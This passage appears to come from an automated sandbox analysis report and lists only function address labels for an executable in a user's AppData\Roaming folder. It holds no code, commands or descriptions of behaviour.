Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0025E8A8	8_2_0025E8A8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0025F1D9	8_2_0025F1D9
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0025FB08	8_2_0025FB08
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0025DD41	8_2_0025DD41
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0025ED40	8_2_0025ED40
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0025D5B8	8_2_0025D5B8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0025D5C8	8_2_0025D5C8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0025F670	8_2_0025F670
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00560040	8_2_00560040
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00563240	8_2_00563240
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00566440	8_2_00566440
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00561C60	8_2_00561C60
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00564E60	8_2_00564E60
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00568060	8_2_00568060
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00562C00	8_2_00562C00
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00565E00	8_2_00565E00
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00569000	8_2_00569000
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00561620	8_2_00561620
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00564820	8_2_00564820
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00567A20	8_2_00567A20
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00560CC0	8_2_00560CC0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00563EC0	8_2_00563EC0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005670C0	8_2_005670C0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005628E0	8_2_005628E0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00565AE0	8_2_00565AE0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00568CE0	8_2_00568CE0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00560680	8_2_00560680
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00563880	8_2_00563880
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00566A80	8_2_00566A80
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005622A0	8_2_005622A0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005654A0	8_2_005654A0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005686A0	8_2_005686A0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00561940	8_2_00561940
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00564B40	8_2_00564B40
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00567D40	8_2_00567D40
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00560360	8_2_00560360
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00563560	8_2_00563560
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00566760	8_2_00566760
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00561300	8_2_00561300
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00564500	8_2_00564500
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00567700	8_2_00567700
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00562F20	8_2_00562F20
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00566120	8_2_00566120
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005625C0	8_2_005625C0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005657C0	8_2_005657C0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005689C0	8_2_005689C0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00560FE0	8_2_00560FE0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005641E0	8_2_005641E0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005673E0	8_2_005673E0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00560990	8_2_00560990
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00561F80	8_2_00561F80
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00565180	8_2_00565180
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00568380	8_2_00568380
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005609A0	8_2_005609A0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00563BA0	8_2_00563BA0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00566DA0	8_2_00566DA0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F82B0	8_2_005F82B0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F3751	8_2_005F3751
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F4050	8_2_005F4050
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FE250	8_2_005FE250
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F9F4F	8_2_005F9F4F
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F5748	8_2_005F5748
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FB748	8_2_005FB748
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F0040	8_2_005F0040
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F6E40	8_2_005F6E40
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F8C40	8_2_005F8C40
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F4040	8_2_005F4040
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F6078	8_2_005F6078
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F8778	8_2_005F8778
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FDD78	8_2_005FDD78
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FB272	8_2_005FB272
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F0970	8_2_005F0970
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F7770	8_2_005F7770
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FF570	8_2_005FF570
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F4970	8_2_005F4970
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F2068	8_2_005F2068
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FCA68	8_2_005FCA68
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F6068	8_2_005F6068
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F8767	8_2_005F8767
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F3760	8_2_005F3760
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F9F60	8_2_005F9F60
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F0960	8_2_005F0960
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F7760	8_2_005F7760
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F4E18	8_2_005F4E18
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FE718	8_2_005FE718
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FA418	8_2_005FA418
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F6510	8_2_005F6510
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FBC10	8_2_005FBC10
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FE70A	8_2_005FE70A
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F4E09	8_2_005F4E09
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F0E08	8_2_005F0E08
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F7C08	8_2_005F7C08
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F9108	8_2_005F9108
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F2500	8_2_005F2500
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F6500	8_2_005F6500
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FE23F	8_2_005FE23F
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F5739	8_2_005F5739
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F1738	8_2_005F1738
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FFA38	8_2_005FFA38
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FB737	8_2_005FB737
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F6E32	8_2_005F6E32
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F8C31	8_2_005F8C31
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F2E30	8_2_005F2E30
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FCF30	8_2_005FCF30
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FA428	8_2_005FA428
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FFA28	8_2_005FFA28
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FCF20	8_2_005FCF20
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F04D8	8_2_005F04D8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F72D8	8_2_005F72D8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FC0D8	8_2_005FC0D8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F44D8	8_2_005F44D8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F1BD0	8_2_005F1BD0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F95D0	8_2_005F95D0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F5BD0	8_2_005F5BD0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FEBCF	8_2_005FEBCF
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F72C9	8_2_005F72C9
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F32C8	8_2_005F32C8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FD8C0	8_2_005FD8C0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F95C0	8_2_005F95C0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F90FC	8_2_005F90FC
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FD3F8	8_2_005FD3F8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F0DF8	8_2_005F0DF8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F7BF8	8_2_005F7BF8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FA8F0	8_2_005FA8F0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F44E8	8_2_005F44E8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FD3E8	8_2_005FD3E8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F5BE0	8_2_005F5BE0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FEBE0	8_2_005FEBE0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FA8E0	8_2_005FA8E0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F699A	8_2_005F699A
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F2998	8_2_005F2998
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F9A98	8_2_005F9A98
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FF098	8_2_005FF098
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FC590	8_2_005FC590
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F9A8C	8_2_005F9A8C
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FDD88	8_2_005FDD88
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F4980	8_2_005F4980
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FB280	8_2_005FB280
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F3BB8	8_2_005F3BB8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FADB8	8_2_005FADB8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F52B0	8_2_005F52B0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FD8AF	8_2_005FD8AF
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F3BA9	8_2_005F3BA9
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F69A8	8_2_005F69A8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FF0A8	8_2_005FF0A8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FADA8	8_2_005FADA8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F52A1	8_2_005F52A1
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F12A0	8_2_005F12A0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005FC5A0	8_2_005FC5A0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061A120	8_2_0061A120
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061C060	8_2_0061C060
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061F260	8_2_0061F260
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061D640	8_2_0061D640
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061A440	8_2_0061A440
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00610040	8_2_00610040
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061BA20	8_2_0061BA20
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061EC20	8_2_0061EC20
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00611828	8_2_00611828
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061D000	8_2_0061D000
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00613010	8_2_00613010
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00610012	8_2_00610012
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061CCE0	8_2_0061CCE0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00611CF0	8_2_00611CF0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006104F8	8_2_006104F8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061E2C0	8_2_0061E2C0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061B0C0	8_2_0061B0C0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006134D8	8_2_006134D8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061C6A0	8_2_0061C6A0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061F8A0	8_2_0061F8A0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061AA80	8_2_0061AA80
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00612680	8_2_00612680
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061DC80	8_2_0061DC80
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00610E87	8_2_00610E87
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00610E98	8_2_00610E98
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061A760	8_2_0061A760
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00611360	8_2_00611360
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061D960	8_2_0061D960
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061BD40	8_2_0061BD40
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061EF40	8_2_0061EF40
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00612B48	8_2_00612B48
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061A750	8_2_0061A750
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061D320	8_2_0061D320
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061B700	8_2_0061B700
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061E900	8_2_0061E900
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00610508	8_2_00610508
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061E5E0	8_2_0061E5E0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061B3E0	8_2_0061B3E0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061C9C0	8_2_0061C9C0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061FBC0	8_2_0061FBC0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006109C2	8_2_006109C2
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006109D0	8_2_006109D0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061ADA0	8_2_0061ADA0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006139A0	8_2_006139A0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061DFA0	8_2_0061DFA0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006121B8	8_2_006121B8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061C380	8_2_0061C380
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0061F580	8_2_0061F580
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00670040	8_2_00670040
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067B760	8_2_0067B760
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00673D69	8_2_00673D69
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067AA68	8_2_0067AA68
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067C468	8_2_0067C468
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067B770	8_2_0067B770
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00673070	8_2_00673070
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00674A70	8_2_00674A70
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00673D78	8_2_00673D78
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067C478	8_2_0067C478
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067E978	8_2_0067E978
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00675778	8_2_00675778
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067DE78	8_2_0067DE78
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067F740	8_2_0067F740
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00676D40	8_2_00676D40
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00677A40	8_2_00677A40
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00678740	8_2_00678740
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00677A48	8_2_00677A48
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00679448	8_2_00679448
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00678750	8_2_00678750
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067305F	8_2_0067305F
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067AA59	8_2_0067AA59
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00679458	8_2_00679458
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067C020	8_2_0067C020
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00673920	8_2_00673920
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00675320	8_2_00675320
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067CD28	8_2_0067CD28
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00674628	8_2_00674628
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00676028	8_2_00676028
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00675330	8_2_00675330
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067DA30	8_2_0067DA30
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00676D30	8_2_00676D30
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067F730	8_2_0067F730
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00676038	8_2_00676038
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00679000	8_2_00679000
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00679D08	8_2_00679D08
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067B308	8_2_0067B308
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00670012	8_2_00670012
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067EE10	8_2_0067EE10
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00673910	8_2_00673910
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067C010	8_2_0067C010
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067461C	8_2_0067461C
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067B318	8_2_0067B318
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00675BE0	8_2_00675BE0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067E4E0	8_2_0067E4E0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006768E8	8_2_006768E8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006782F6	8_2_006782F6
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006775F0	8_2_006775F0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00678FF0	8_2_00678FF0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006782F8	8_2_006782F8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067C8C1	8_2_0067C8C1
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067AEC0	8_2_0067AEC0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006741C0	8_2_006741C0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067BBC8	8_2_0067BBC8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006734C8	8_2_006734C8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00675BD4	8_2_00675BD4
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067C8D0	8_2_0067C8D0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006741D0	8_2_006741D0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00674ED0	8_2_00674ED0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006768DC	8_2_006768DC
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00674ED8	8_2_00674ED8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067D5D8	8_2_0067D5D8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067FBD8	8_2_0067FBD8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006798A2	8_2_006798A2
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00677EA0	8_2_00677EA0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067F2A8	8_2_0067F2A8
